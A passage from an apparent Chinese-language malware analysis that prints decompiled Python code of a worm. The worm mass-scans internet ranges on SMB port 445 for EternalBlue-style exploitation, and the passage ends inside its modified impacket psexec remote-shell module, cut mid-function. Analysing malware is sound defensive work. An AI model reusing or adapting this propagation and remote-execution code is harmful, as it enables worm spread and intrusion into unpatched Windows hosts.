                <span class="k">if</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'10'</span><span class="p">:</span>
                    <span class="k">continue</span>
                <span class="k">if</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'0'</span><span class="p">:</span>
                    <span class="k">continue</span>
                <span class="k">if</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'100'</span><span class="p">:</span>
                    <span class="k">continue</span>
                <span class="k">if</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'172'</span><span class="p">:</span>
                    <span class="k">continue</span>
                <span class="k">if</span> <span class="nb">int</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">())</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">224</span><span class="p">,</span> <span class="mi">256</span><span class="p">):</span>
                    <span class="k">continue</span>
                <span class="k">print</span> <span class="n">network</span>
                <span class="n">cidr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">cidr</span><span class="p">)</span>
                <span class="n">host_bits</span> <span class="o">=</span> <span class="mi">32</span> <span class="o">-</span> <span class="mi">16</span>
                <span class="n">i</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'&gt;I'</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_aton</span><span class="p">(</span><span class="n">ip</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span>
                <span class="n">start</span> <span class="o">=</span> <span class="n">i</span> <span class="o">&gt;&gt;</span> <span class="n">host_bits</span> <span class="o">&lt;&lt;</span> <span class="n">host_bits</span>
                <span class="n">end</span> <span class="o">=</span> <span class="n">i</span> <span class="o">|</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">host_bits</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span>
                <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">start</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">end</span><span class="p">):</span>
                    <span class="n">semaphore2</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
                    <span class="n">ip</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&gt;I'</span><span class="p">,</span> <span class="n">i</span><span class="p">))</span>
                    <span class="n">t1</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">scansmb3</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">445</span><span class="p">))</span>
                    <span class="n">t1</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>

                <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

        <span class="k">print</span> <span class="s">'smb over  sleep 200s'</span>
        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
        <span class="k">print</span> <span class="s">'eb2 internet'</span>
        <span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="n">xip</span><span class="p">(</span><span class="mi">500</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">s</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'127'</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">if</span> <span class="n">s</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'10'</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">if</span> <span class="n">s</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'0'</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">if</span> <span class="n">s</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'100'</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">if</span> <span class="n">s</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="o">==</span> <span class="s">'172'</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">if</span> <span class="nb">int</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">strip</span><span class="p">())</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">224</span><span class="p">,</span> <span class="mi">256</span><span class="p">):</span>
                <span class="k">continue</span>
            <span class="k">print</span> <span class="n">s</span>
            <span class="n">ip</span><span class="p">,</span> <span class="n">cidr</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'/'</span><span class="p">)</span>
            <span class="n">cidr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">cidr</span><span class="p">)</span>
            <span class="n">host_bits</span> <span class="o">=</span> <span class="mi">32</span> <span class="o">-</span> <span class="n">cidr</span>
            <span class="n">i</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'&gt;I'</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_aton</span><span class="p">(</span><span class="n">ip</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span>
            <span class="n">start</span> <span class="o">=</span> <span class="n">i</span> <span class="o">&gt;&gt;</span> <span class="n">host_bits</span> <span class="o">&lt;&lt;</span> <span class="n">host_bits</span>
            <span class="n">end</span> <span class="o">=</span> <span class="n">i</span> <span class="o">|</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">host_bits</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span>
            <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">start</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">end</span><span class="p">):</span>
                <span class="n">semaphore1</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
                <span class="n">ip</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&gt;I'</span><span class="p">,</span> <span class="n">i</span><span class="p">))</span>
                <span class="n">t1</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">scansmb2</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">445</span><span class="p">))</span>
                <span class="n">t1</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>

            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>

        <span class="k">print</span> <span class="s">'eb2 over'</span>
        <span class="k">print</span> <span class="s">'sleep 10min'</span>
        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
    <span class="n">mmka</span><span class="p">()</span>

<span class="c1"># global h_one ## Warning: Unused global
</span></code></pre></div>  </div>
</details>

<p>里面有两个不是公开的库，mysmb和psexec，其中mysmb看起来是<a href="https://github.com/0xsyr0/OSCP/blob/main/exploits/CVE-2017-0144-EternalBlue-MS17-010-RCE/mysmb.py">永恒之蓝RCE中的代码</a>，psexec有找到几个相似的但是没找到一样的，所以代码也放上来：</p>

<details>
  <summary>
Show Code
</summary>

  <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># uncompyle6 version 3.9.2
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Jun 24 2022, 18:01:55) 
# [GCC 8.5.0 20210514 (Red Hat 8.5.0-13)]
# Embedded file name: psexec.py
</span>
<span class="kn">import</span> <span class="nn">sys</span><span class="p">,</span> <span class="n">os</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">logging</span>
<span class="kn">from</span> <span class="nn">threading</span> <span class="kn">import</span> <span class="n">Thread</span><span class="p">,</span> <span class="n">Lock</span>
<span class="kn">import</span> <span class="nn">argparse</span><span class="p">,</span> <span class="n">random</span><span class="p">,</span> <span class="n">string</span><span class="p">,</span> <span class="n">time</span>
<span class="kn">from</span> <span class="nn">impacket.examples</span> <span class="kn">import</span> <span class="n">logger</span>
<span class="kn">from</span> <span class="nn">impacket</span> <span class="kn">import</span> <span class="n">version</span><span class="p">,</span> <span class="n">smb</span>
<span class="kn">from</span> <span class="nn">impacket.smbconnection</span> <span class="kn">import</span> <span class="n">SMBConnection</span>
<span class="kn">from</span> <span class="nn">impacket.dcerpc.v5</span> <span class="kn">import</span> <span class="n">transport</span>
<span class="kn">from</span> <span class="nn">impacket.structure</span> <span class="kn">import</span> <span class="n">Structure</span>
<span class="kn">from</span> <span class="nn">impacket.examples</span> <span class="kn">import</span> <span class="n">remcomsvc</span><span class="p">,</span> <span class="n">serviceinstall</span>

<span class="k">class</span> <span class="nc">RemComMessage</span><span class="p">(</span><span class="n">Structure</span><span class="p">):</span>
    <span class="n">structure</span> <span class="o">=</span> <span class="p">(</span>
     <span class="p">(</span><span class="s">'Command'</span><span class="p">,</span> <span class="s">'4096s=""'</span><span class="p">),</span>
     <span class="p">(</span><span class="s">'WorkingDir'</span><span class="p">,</span> <span class="s">'260s=""'</span><span class="p">),</span>
     <span class="p">(</span><span class="s">'Priority'</span><span class="p">,</span> <span class="s">'&lt;L=0x20'</span><span class="p">),</span>
     <span class="p">(</span><span class="s">'ProcessID'</span><span class="p">,</span> <span class="s">'&lt;L=0x01'</span><span class="p">),</span>
     <span class="p">(</span><span class="s">'Machine'</span><span class="p">,</span> <span class="s">'260s=""'</span><span class="p">),</span>
     <span class="p">(</span><span class="s">'NoWait'</span><span class="p">,</span> <span class="s">'&lt;L=0'</span><span class="p">))</span>


<span class="k">class</span> <span class="nc">RemComResponse</span><span class="p">(</span><span class="n">Structure</span><span class="p">):</span>
    <span class="n">structure</span> <span class="o">=</span> <span class="p">(</span>
     <span class="p">(</span><span class="s">'ErrorCode'</span><span class="p">,</span> <span class="s">'&lt;L=0'</span><span class="p">),</span>
     <span class="p">(</span><span class="s">'ReturnCode'</span><span class="p">,</span> <span class="s">'&lt;L=0'</span><span class="p">))</span>


<span class="n">RemComSTDOUT</span> <span class="o">=</span> <span class="s">'RemCom_stdout'</span>
<span class="n">RemComSTDIN</span> <span class="o">=</span> <span class="s">'RemCom_stdin'</span>
<span class="n">RemComSTDERR</span> <span class="o">=</span> <span class="s">'RemCom_stderr'</span>
<span class="n">lock</span> <span class="o">=</span> <span class="n">Lock</span><span class="p">()</span>

<span class="k">class</span> <span class="nc">RemoteShell</span><span class="p">(</span><span class="n">cmd</span><span class="p">.</span><span class="n">Cmd</span><span class="p">):</span>

    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">server</span><span class="p">,</span> <span class="n">port</span><span class="p">,</span> <span class="n">credentials</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">fid</span><span class="p">,</span> <span class="n">share</span><span class="p">,</span> <span class="n">transport</span><span class="p">):</span>
        <span class="n">cmd</span><span class="p">.</span><span class="n">Cmd</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">prompt</span> <span class="o">=</span> <span class="s">'</span><span class="se">\x08</span><span class="s">'</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">server</span> <span class="o">=</span> <span class="n">server</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">transferClient</span> <span class="o">=</span> <span class="bp">None</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">tid</span> <span class="o">=</span> <span class="n">tid</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">fid</span> <span class="o">=</span> <span class="n">fid</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">credentials</span> <span class="o">=</span> <span class="n">credentials</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">share</span> <span class="o">=</span> <span class="n">share</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">port</span> <span class="o">=</span> <span class="n">port</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">transport</span> <span class="o">=</span> <span class="n">transport</span>
        <span class="k">return</span>

    <span class="k">def</span> <span class="nf">connect_transferClient</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">transferClient</span> <span class="o">=</span> <span class="n">SMBConnection</span><span class="p">(</span><span class="s">'*SMBSERVER'</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">getRemoteHost</span><span class="p">(),</span> <span class="n">sess_port</span><span class="o">=</span><span class="bp">self</span><span class="p">.</span><span class="n">port</span><span class="p">,</span> <span class="n">preferredDialect</span><span class="o">=</span><span class="n">dialect</span><span class="p">)</span>
        <span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">,</span> <span class="n">aesKey</span><span class="p">,</span> <span class="n">TGT</span><span class="p">,</span> <span class="n">TGS</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">credentials</span>
        <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">transport</span><span class="p">.</span><span class="n">get_kerberos</span><span class="p">()</span> <span class="ow">is</span> <span class="bp">True</span><span class="p">:</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">transferClient</span><span class="p">.</span><span class="n">kerberosLogin</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">,</span> <span class="n">aesKey</span><span class="p">,</span> <span class="n">TGT</span><span class="o">=</span><span class="n">TGT</span><span class="p">,</span> <span class="n">TGS</span><span class="o">=</span><span class="n">TGS</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">transferClient</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">do_help</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">line</span><span class="p">):</span>
        <span class="k">print</span> <span class="s">'</span><span class="se">\n</span><span class="s"> lcd {path}                 - changes the current local directory to {path}</span><span class="se">\n</span><span class="s"> exit                       - terminates the server process (and this session)</span><span class="se">\n</span><span class="s"> put {src_file, dst_path}   - uploads a local file to the dst_path RELATIVE to the connected share (%s)</span><span class="se">\n</span><span class="s"> get {file}                 - downloads pathname RELATIVE to the connected share (%s) to the current local dir</span><span class="se">\n</span><span class="s"> ! {cmd}                    - executes a local shell cmd</span><span class="se">\n</span><span class="s">'</span> <span class="o">%</span> <span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">share</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">share</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">send_data</span><span class="p">(</span><span class="s">'</span><span class="se">\r\n</span><span class="s">'</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">do_shell</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">s</span><span class="p">):</span>
        <span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">send_data</span><span class="p">(</span><span class="s">'</span><span class="se">\r\n</span><span class="s">'</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">do_get</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">src_path</span><span class="p">):</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">transferClient</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
                <span class="bp">self</span><span class="p">.</span><span class="n">connect_transferClient</span><span class="p">()</span>
            <span class="kn">import</span> <span class="nn">ntpath</span>
            <span class="n">filename</span> <span class="o">=</span> <span class="n">ntpath</span><span class="p">.</span><span class="n">basename</span><span class="p">(</span><span class="n">src_path</span><span class="p">)</span>
            <span class="n">fh</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="s">'wb'</span><span class="p">)</span>
            <span class="n">logging</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Downloading %s</span><span class="se">\\</span><span class="s">%s'</span> <span class="o">%</span> <span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">share</span><span class="p">,</span> <span class="n">src_path</span><span class="p">))</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">transferClient</span><span class="p">.</span><span class="n">getFile</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">share</span><span class="p">,</span> <span class="n">src_path</span><span class="p">,</span> <span class="n">fh</span><span class="p">.</span><span class="n">write</span><span class="p">)</span>
            <span class="n">fh</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="n">logging</span><span class="p">.</span><span class="n">critical</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">))</span>

        <span class="bp">self</span><span class="p">.</span><span class="n">send_data</span><span class="p">(</span><span class="s">'</span><span class="se">\r\n</span><span class="s">'</span><span class="p">)</span>
        <span class="k">return</span>

    <span class="k">def</span> <span class="nf">do_put</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">s</span><span class="p">):</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">transferClient</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
                <span class="bp">self</span><span class="p">.</span><span class="n">connect_transferClient</span><span class="p">()</span>
            <span class="n">params</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">' '</span><span class="p">)</span>
            <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">params</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">:</span>
                <span class="n">src_path</span> <span class="o">=</span> <span class="n">params</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
                <span class="n">dst_path</span> <span class="o">=</span> <span class="n">params</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
            <span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">params</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
                <span class="n">src_path</span> <span class="o">=</span> <span class="n">params</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
                <span class="n">dst_path</span> <span class="o">=</span> <span class="s">'/'</span>
            <span class="n">src_file</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">basename</span><span class="p">(</span><span class="n">src_path</span><span class="p">)</span>
            <span class="n">fh</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">src_path</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span>
            <span class="n">f</span> <span class="o">=</span> <span class="n">dst_path</span> <span class="o">+</span> <span class="s">'/'</span> <span class="o">+</span> <span class="n">src_file</span>
            <span class="k">print</span> <span class="s">'!!!!!!!!!!!!!!!!'</span> <span class="o">+</span> <span class="n">f</span>
            <span class="n">pathname</span> <span class="o">=</span> <span class="n">string</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="s">'/'</span><span class="p">,</span> <span class="s">'</span><span class="se">\\</span><span class="s">'</span><span class="p">)</span>
            <span class="n">logging</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Uploading1111111111 %s to %s</span><span class="se">\\</span><span class="s">%s'</span> <span class="o">%</span> <span class="p">(</span><span class="n">src_file</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">share</span><span class="p">,</span> <span class="n">dst_path</span><span class="p">))</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">transferClient</span><span class="p">.</span><span class="n">putFile</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">share</span><span class="p">,</span> <span class="n">pathname</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">stdin</span><span class="p">.</span><span class="n">encoding</span><span class="p">),</span> <span class="n">fh</span><span class="p">.</span><span class="n">read</span><span class="p">)</span>
            <span class="n">fh</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="n">logging</span><span class="p">.</span><span class="n">error</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">))</span>

        <span class="bp">self</span><span class="p">.</span><span class="n">send_data</span><span class="p">(</span><span class="s">'</span><span class="se">\r\n</span><span class="s">'</span><span class="p">)</span>
        <span class="k">return</span>

    <span class="k">def</span> <span class="nf">do_lcd</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">s</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">s</span> <span class="o">==</span> <span class="s">''</span><span class="p">:</span>
            <span class="k">print</span> <span class="n">os</span><span class="p">.</span><span class="n">getcwd</span><span class="p">()</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">os</span><span class="p">.</span><span class="n">chdir</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">send_data</span><span class="p">(</span><span class="s">'</span><span class="se">\r\n</span><span class="s">'</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">emptyline</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">send_data</span><span class="p">(</span><span class="s">'</span><span class="se">\r\n</span><span class="s">'</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">default</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">line</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">send_data</span><span class="p">(</span><span class="n">line</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">stdin</span><span class="p">.</span><span class="n">encoding</span><span class="p">).</span><span class="n">encode</span><span class="p">(</span><span class="s">'cp437'</span><span class="p">)</span> <span class="o">+</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">'</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">send_data</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">hideOutput</span><span class="o">=</span><span class="bp">True</span><span class="p">):</span>
        <span class="k">global</span> <span class="n">LastDataSent</span>
        <span class="k">if</span> <span class="n">hideOutput</span> <span class="ow">is</span> <span class="bp">True</span><span class="p">:</span>
            <span class="n">LastDataSent</span> <span class="o">=</span> <span class="n">data</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">LastDataSent</span> <span class="o">=</span> <span class="s">''</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">writeFile</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">tid</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">fid</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>


<span class="k">class</span> <span class="nc">Pipes</span><span class="p">(</span><span class="n">Thread</span><span class="p">):</span>

    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">transport</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permissions</span><span class="p">,</span> <span class="n">share</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span>
        <span class="n">Thread</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">server</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">transport</span> <span class="o">=</span> <span class="n">transport</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">credentials</span> <span class="o">=</span> <span class="n">transport</span><span class="p">.</span><span class="n">get_credentials</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">tid</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">fid</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">share</span> <span class="o">=</span> <span class="n">share</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">port</span> <span class="o">=</span> <span class="n">transport</span><span class="p">.</span><span class="n">get_dport</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">pipe</span> <span class="o">=</span> <span class="n">pipe</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">permissions</span> <span class="o">=</span> <span class="n">permissions</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">daemon</span> <span class="o">=</span> <span class="bp">True</span>

    <span class="k">def</span> <span class="nf">connectPipe</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">server</span> <span class="o">=</span> <span class="n">SMBConnection</span><span class="p">(</span><span class="s">'*SMBSERVER'</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">transport</span><span class="p">.</span><span class="n">get_smb_connection</span><span class="p">().</span><span class="n">getRemoteHost</span><span class="p">(),</span> <span class="n">sess_port</span><span class="o">=</span><span class="bp">self</span><span class="p">.</span><span class="n">port</span><span class="p">,</span> <span class="n">preferredDialect</span><span class="o">=</span><span class="n">dialect</span><span class="p">)</span>
            <span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">,</span> <span class="n">aesKey</span><span class="p">,</span> <span class="n">TGT</span><span class="p">,</span> <span class="n">TGS</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">credentials</span>
            <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">transport</span><span class="p">.</span><span class="n">get_kerberos</span><span class="p">()</span> <span class="ow">is</span> <span class="bp">True</span><span class="p">:</span>
                <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">kerberosLogin</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">,</span> <span class="n">aesKey</span><span class="p">,</span> <span class="n">TGT</span><span class="o">=</span><span class="n">TGT</span><span class="p">,</span> <span class="n">TGS</span><span class="o">=</span><span class="n">TGS</span><span class="p">)</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">)</span>
